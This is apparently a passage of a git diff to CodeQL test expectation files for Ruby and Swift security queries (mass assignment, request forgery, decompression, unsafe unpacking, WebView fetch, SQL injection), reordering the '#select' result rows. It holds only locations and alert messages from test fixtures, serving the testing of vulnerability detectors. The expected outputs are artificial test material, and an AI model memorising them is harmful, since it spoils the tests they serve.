@@ -82,3 +60,25 @@ nodes | test.rb:53:18:53:23 | call to params | semmle.label | call to params | | test.rb:53:18:53:35 | call to to_unsafe_h | semmle.label | call to to_unsafe_h | subpaths +#select +| test.rb:8:18:8:28 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:8:18:8:28 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:18:20:18:30 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:18:20:18:30 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:19:21:19:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:19:21:19:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:20:22:20:32 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:20:22:20:32 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:21:21:21:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:21:21:21:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:22:22:22:32 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:22:22:22:32 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. 
| test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:25:21:25:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:25:21:25:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:26:24:26:34 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:26:24:26:34 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:27:22:27:32 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:27:22:27:32 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:28:25:28:35 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:28:25:28:35 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:29:21:29:31 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:29:21:29:31 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:31:32:31:42 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:31:32:31:42 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:32:33:32:43 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:32:33:32:43 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. 
| test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:33:36:33:46 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:33:36:33:46 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:34:32:34:42 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:34:32:34:42 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:35:33:35:43 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:35:33:35:43 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:36:26:36:36 | call to user_params | test.rb:43:9:43:14 | call to params | test.rb:36:26:36:36 | call to user_params | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:43:9:43:14 | call to params | this remote flow source | +| test.rb:49:18:49:18 | x | test.rb:47:13:47:18 | call to params | test.rb:49:18:49:18 | x | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:47:13:47:18 | call to params | this remote flow source | +| test.rb:51:18:51:40 | call to permit | test.rb:51:18:51:23 | call to params | test.rb:51:18:51:40 | call to permit | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:51:18:51:23 | call to params | this remote flow source | +| test.rb:52:18:52:69 | call to permit | test.rb:52:18:52:23 | call to params | test.rb:52:18:52:69 | call to permit | This mass assignment operation can assign user-controlled attributes from $@. 
| test.rb:52:18:52:23 | call to params | this remote flow source | +| test.rb:53:18:53:35 | call to to_unsafe_h | test.rb:53:18:53:23 | call to params | test.rb:53:18:53:35 | call to to_unsafe_h | This mass assignment operation can assign user-controlled attributes from $@. | test.rb:53:18:53:23 | call to params | this remote flow source | diff --git a/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.expected b/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.expected index 26740b5e3f20..c97ff12fc3d0 100644 --- a/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.expected +++ b/ruby/ql/test/query-tests/security/cwe-918/ServerSideRequestForgery.expected @@ -1,7 +1,3 @@ -#select -| ServerSideRequestForgery.rb:11:31:11:62 | "#{...}/logins" | ServerSideRequestForgery.rb:10:32:10:37 | call to params | ServerSideRequestForgery.rb:11:31:11:62 | "#{...}/logins" | The URL of this request depends on a $@. | ServerSideRequestForgery.rb:10:32:10:37 | call to params | user-provided value | -| ServerSideRequestForgery.rb:15:33:15:44 | ...[...] | ServerSideRequestForgery.rb:15:33:15:38 | call to params | ServerSideRequestForgery.rb:15:33:15:44 | ...[...] | The URL of this request depends on a $@. | ServerSideRequestForgery.rb:15:33:15:38 | call to params | user-provided value | -| ServerSideRequestForgery.rb:20:45:20:56 | ...[...] | ServerSideRequestForgery.rb:20:45:20:50 | call to params | ServerSideRequestForgery.rb:20:45:20:56 | ...[...] | The URL of this request depends on a $@. | ServerSideRequestForgery.rb:20:45:20:50 | call to params | user-provided value | edges | ServerSideRequestForgery.rb:10:9:10:28 | users_service_domain | ServerSideRequestForgery.rb:11:31:11:62 | "#{...}/logins" | provenance | AdditionalTaintStep | | ServerSideRequestForgery.rb:10:32:10:37 | call to params | ServerSideRequestForgery.rb:10:32:10:60 | ...[...] | provenance | | 
@@ -18,3 +14,7 @@ nodes | ServerSideRequestForgery.rb:20:45:20:50 | call to params | semmle.label | call to params | | ServerSideRequestForgery.rb:20:45:20:56 | ...[...] | semmle.label | ...[...] | subpaths +#select +| ServerSideRequestForgery.rb:11:31:11:62 | "#{...}/logins" | ServerSideRequestForgery.rb:10:32:10:37 | call to params | ServerSideRequestForgery.rb:11:31:11:62 | "#{...}/logins" | The URL of this request depends on a $@. | ServerSideRequestForgery.rb:10:32:10:37 | call to params | user-provided value | +| ServerSideRequestForgery.rb:15:33:15:44 | ...[...] | ServerSideRequestForgery.rb:15:33:15:38 | call to params | ServerSideRequestForgery.rb:15:33:15:44 | ...[...] | The URL of this request depends on a $@. | ServerSideRequestForgery.rb:15:33:15:38 | call to params | user-provided value | +| ServerSideRequestForgery.rb:20:45:20:56 | ...[...] | ServerSideRequestForgery.rb:20:45:20:50 | call to params | ServerSideRequestForgery.rb:20:45:20:56 | ...[...] | The URL of this request depends on a $@. | ServerSideRequestForgery.rb:20:45:20:50 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/decompression-api/DecompressionApi.expected b/ruby/ql/test/query-tests/security/decompression-api/DecompressionApi.expected index 67bfd8f8762d..20be59524bfa 100644 --- a/ruby/ql/test/query-tests/security/decompression-api/DecompressionApi.expected +++ b/ruby/ql/test/query-tests/security/decompression-api/DecompressionApi.expected 
@@ -1,6 +1,3 @@ -#select -| decompression_api.rb:5:31:5:34 | path | decompression_api.rb:4:16:4:21 | call to params | decompression_api.rb:5:31:5:34 | path | This call to $@ is unsafe because user-controlled data is used to set the object being decompressed, which could lead to a denial of service attack or malicious code extracted from an unknown source. | decompression_api.rb:5:9:5:35 | call to inflate | inflate | -| decompression_api.rb:15:31:15:43 | ...[...] | decompression_api.rb:15:31:15:36 | call to params | decompression_api.rb:15:31:15:43 | ...[...] | This call to $@ is unsafe because user-controlled data is used to set the object being decompressed, which could lead to a denial of service attack or malicious code extracted from an unknown source. | decompression_api.rb:15:9:15:44 | call to open_buffer | open_buffer | edges | decompression_api.rb:4:9:4:12 | path | decompression_api.rb:5:31:5:34 | path | provenance | | | decompression_api.rb:4:16:4:21 | call to params | decompression_api.rb:4:16:4:28 | ...[...] | provenance | | 
@@ -14,3 +11,6 @@ nodes | decompression_api.rb:15:31:15:36 | call to params | semmle.label | call to params | | decompression_api.rb:15:31:15:43 | ...[...] | semmle.label | ...[...] | subpaths +#select +| decompression_api.rb:5:31:5:34 | path | decompression_api.rb:4:16:4:21 | call to params | decompression_api.rb:5:31:5:34 | path | This call to $@ is unsafe because user-controlled data is used to set the object being decompressed, which could lead to a denial of service attack or malicious code extracted from an unknown source. | decompression_api.rb:5:9:5:35 | call to inflate | inflate | +| decompression_api.rb:15:31:15:43 | ...[...] | decompression_api.rb:15:31:15:36 | call to params | decompression_api.rb:15:31:15:43 | ...[...] | This call to $@ is unsafe because user-controlled data is used to set the object being decompressed, which could lead to a denial of service attack or malicious code extracted from an unknown source. | decompression_api.rb:15:9:15:44 | call to open_buffer | open_buffer | diff --git a/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.expected b/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.expected index 47477a9aa60f..013959ee4505 100644 --- a/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.expected +++ b/swift/ql/test/query-tests/Security/CWE-022/UnsafeUnpack/UnsafeUnpack.expected 
@@ -1,6 +1,3 @@ -#select -| UnsafeUnpack.swift:64:27:64:27 | source | UnsafeUnpack.swift:62:9:62:48 | call to Data.init(contentsOf:options:) | UnsafeUnpack.swift:64:27:64:27 | source | Unsafe unpacking from a malicious zip retrieved from a remote location. | -| UnsafeUnpack.swift:67:39:67:39 | source | UnsafeUnpack.swift:62:9:62:48 | call to Data.init(contentsOf:options:) | UnsafeUnpack.swift:67:39:67:39 | source | Unsafe unpacking from a malicious zip retrieved from a remote location. | edges | UnsafeUnpack.swift:62:9:62:48 | call to Data.init(contentsOf:options:) | UnsafeUnpack.swift:62:60:62:60 | source | provenance | Config | | UnsafeUnpack.swift:62:60:62:60 | source | UnsafeUnpack.swift:64:27:64:27 | source | provenance | | @@ -11,3 +8,6 @@ nodes | UnsafeUnpack.swift:64:27:64:27 | source | semmle.label | source | | UnsafeUnpack.swift:67:39:67:39 | source | semmle.label | source | subpaths +#select +| UnsafeUnpack.swift:64:27:64:27 | source | UnsafeUnpack.swift:62:9:62:48 | call to Data.init(contentsOf:options:) | UnsafeUnpack.swift:64:27:64:27 | source | Unsafe unpacking from a malicious zip retrieved from a remote location. | +| UnsafeUnpack.swift:67:39:67:39 | source | UnsafeUnpack.swift:62:9:62:48 | call to Data.init(contentsOf:options:) | UnsafeUnpack.swift:67:39:67:39 | source | Unsafe unpacking from a malicious zip retrieved from a remote location. | diff --git a/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.expected b/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.expected index d796aa2da25e..c2fefc171e64 100644 --- a/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.expected +++ b/swift/ql/test/query-tests/Security/CWE-079/UnsafeWebViewFetch.expected 
@@ -1,22 +1,3 @@ -#select -| UnsafeWebViewFetch.swift:103:25:103:84 | try! ... | UnsafeWebViewFetch.swift:103:30:103:84 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:103:25:103:84 | try! ... | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:106:25:106:25 | data | UnsafeWebViewFetch.swift:105:18:105:72 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:106:25:106:25 | data | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:109:25:109:53 | try! ... | UnsafeWebViewFetch.swift:109:30:109:53 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:109:25:109:53 | try! ... | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:120:25:120:39 | call to getRemoteData() | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:120:25:120:39 | call to getRemoteData() | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:121:25:121:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:121:25:121:25 | remoteString | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:124:25:124:51 | ... .+(_:_:) ... | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:124:25:124:51 | ... .+(_:_:) ... | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:127:25:127:25 | "..." | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:127:25:127:25 | "..." | Tainted data is used in a WebView fetch without restricting the base URL. 
| -| UnsafeWebViewFetch.swift:139:25:139:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:139:25:139:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | -| UnsafeWebViewFetch.swift:141:25:141:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:141:25:141:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | -| UnsafeWebViewFetch.swift:154:15:154:15 | remoteData | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:154:15:154:15 | remoteData | Tainted data is used in a WebView fetch with a tainted base URL. | -| UnsafeWebViewFetch.swift:167:25:167:39 | call to getRemoteData() | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:167:25:167:39 | call to getRemoteData() | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:168:25:168:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:168:25:168:25 | remoteString | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:171:25:171:51 | ... .+(_:_:) ... | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:171:25:171:51 | ... .+(_:_:) ... | Tainted data is used in a WebView fetch without restricting the base URL. | -| UnsafeWebViewFetch.swift:174:25:174:25 | "..." | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:174:25:174:25 | "..." | Tainted data is used in a WebView fetch without restricting the base URL. 
| -| UnsafeWebViewFetch.swift:186:25:186:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:186:25:186:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | -| UnsafeWebViewFetch.swift:188:25:188:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:188:25:188:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | -| UnsafeWebViewFetch.swift:201:15:201:15 | remoteData | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:201:15:201:15 | remoteData | Tainted data is used in a WebView fetch with a tainted base URL. | -| UnsafeWebViewFetch.swift:210:25:210:25 | htmlData | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:210:25:210:25 | htmlData | Tainted data is used in a WebView fetch without restricting the base URL. | edges | UnsafeWebViewFetch.swift:94:10:94:37 | try ... | UnsafeWebViewFetch.swift:117:21:117:35 | call to getRemoteData() | provenance | | | UnsafeWebViewFetch.swift:94:10:94:37 | try ... | UnsafeWebViewFetch.swift:120:25:120:39 | call to getRemoteData() | provenance | | 
@@ -154,3 +135,22 @@ nodes | UnsafeWebViewFetch.swift:210:25:210:25 | htmlData | semmle.label | htmlData | | UnsafeWebViewFetch.swift:211:25:211:25 | htmlData | semmle.label | htmlData | subpaths +#select +| UnsafeWebViewFetch.swift:103:25:103:84 | try! ... | UnsafeWebViewFetch.swift:103:30:103:84 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:103:25:103:84 | try! ... | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:106:25:106:25 | data | UnsafeWebViewFetch.swift:105:18:105:72 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:106:25:106:25 | data | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:109:25:109:53 | try! ... | UnsafeWebViewFetch.swift:109:30:109:53 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:109:25:109:53 | try! ... | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:120:25:120:39 | call to getRemoteData() | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:120:25:120:39 | call to getRemoteData() | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:121:25:121:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:121:25:121:25 | remoteString | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:124:25:124:51 | ... .+(_:_:) ... | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:124:25:124:51 | ... .+(_:_:) ... | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:127:25:127:25 | "..." | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:127:25:127:25 | "..." 
| Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:139:25:139:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:139:25:139:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | +| UnsafeWebViewFetch.swift:141:25:141:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:141:25:141:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | +| UnsafeWebViewFetch.swift:154:15:154:15 | remoteData | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:154:15:154:15 | remoteData | Tainted data is used in a WebView fetch with a tainted base URL. | +| UnsafeWebViewFetch.swift:167:25:167:39 | call to getRemoteData() | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:167:25:167:39 | call to getRemoteData() | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:168:25:168:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:168:25:168:25 | remoteString | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:171:25:171:51 | ... .+(_:_:) ... | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:171:25:171:51 | ... .+(_:_:) ... | Tainted data is used in a WebView fetch without restricting the base URL. | +| UnsafeWebViewFetch.swift:174:25:174:25 | "..." | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:174:25:174:25 | "..." | Tainted data is used in a WebView fetch without restricting the base URL. 
| +| UnsafeWebViewFetch.swift:186:25:186:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:186:25:186:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | +| UnsafeWebViewFetch.swift:188:25:188:25 | remoteString | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:188:25:188:25 | remoteString | Tainted data is used in a WebView fetch with a tainted base URL. | +| UnsafeWebViewFetch.swift:201:15:201:15 | remoteData | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:201:15:201:15 | remoteData | Tainted data is used in a WebView fetch with a tainted base URL. | +| UnsafeWebViewFetch.swift:210:25:210:25 | htmlData | UnsafeWebViewFetch.swift:94:14:94:37 | call to String.init(contentsOf:) | UnsafeWebViewFetch.swift:210:25:210:25 | htmlData | Tainted data is used in a WebView fetch without restricting the base URL. | diff --git a/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected b/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected index 9e91919d5c57..36ebcd04a6ee 100644 --- a/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected +++ b/swift/ql/test/query-tests/Security/CWE-089/SqlInjection.expected 
@@ -1,117 +1,3 @@ -#select -| GRDB.swift:106:41:106:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:106:41:106:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:108:41:108:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:108:41:108:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:111:43:111:43 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:111:43:111:43 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:114:51:114:51 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:114:51:114:51 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:117:27:117:27 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:117:27:117:27 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:119:27:119:27 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:119:27:119:27 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:122:41:122:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:122:41:122:41 | remoteString | This query depends on a $@. 
| GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:124:41:124:41 | remoteString | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | GRDB.swift:124:41:124:41 | remoteString | This query depends on a $@. | GRDB.swift:104:25:104:79 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:132:39:132:39 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:132:39:132:39 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:135:46:135:46 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:135:46:135:46 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:138:56:138:56 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:138:56:138:56 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:141:45:141:45 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:141:45:141:45 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:144:29:144:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:144:29:144:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:145:29:145:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:145:29:145:29 | remoteString | This query depends on a $@. 
| GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:146:29:146:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:146:29:146:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:147:29:147:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:147:29:147:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:148:29:148:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:148:29:148:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:149:29:149:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:149:29:149:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:150:29:150:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:150:29:150:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:151:29:151:29 | remoteString | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | GRDB.swift:151:29:151:29 | remoteString | This query depends on a $@. | GRDB.swift:130:26:130:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:166:32:166:32 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:166:32:166:32 | remoteString | This query depends on a $@. 
| GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:167:39:167:39 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:167:39:167:39 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:168:49:168:49 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:168:49:168:49 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:169:38:169:38 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:169:38:169:38 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:170:22:170:22 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:170:22:170:22 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:172:22:172:22 | remoteString | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | GRDB.swift:172:22:172:22 | remoteString | This query depends on a $@. | GRDB.swift:164:26:164:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:187:33:187:33 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | GRDB.swift:187:33:187:33 | remoteString | This query depends on a $@. | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:190:32:190:32 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | GRDB.swift:190:32:190:32 | remoteString | This query depends on a $@. 
| GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:193:37:193:37 | remoteString | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | GRDB.swift:193:37:193:37 | remoteString | This query depends on a $@. | GRDB.swift:185:26:185:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:201:36:201:36 | remoteString | GRDB.swift:199:26:199:80 | call to String.init(contentsOf:) | GRDB.swift:201:36:201:36 | remoteString | This query depends on a $@. | GRDB.swift:199:26:199:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:209:41:209:41 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:209:41:209:41 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:210:44:210:44 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:210:44:210:44 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | user-provided value | -| GRDB.swift:211:47:211:47 | remoteString | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | GRDB.swift:211:47:211:47 | remoteString | This query depends on a $@. | GRDB.swift:207:26:207:80 | call to String.init(contentsOf:) | 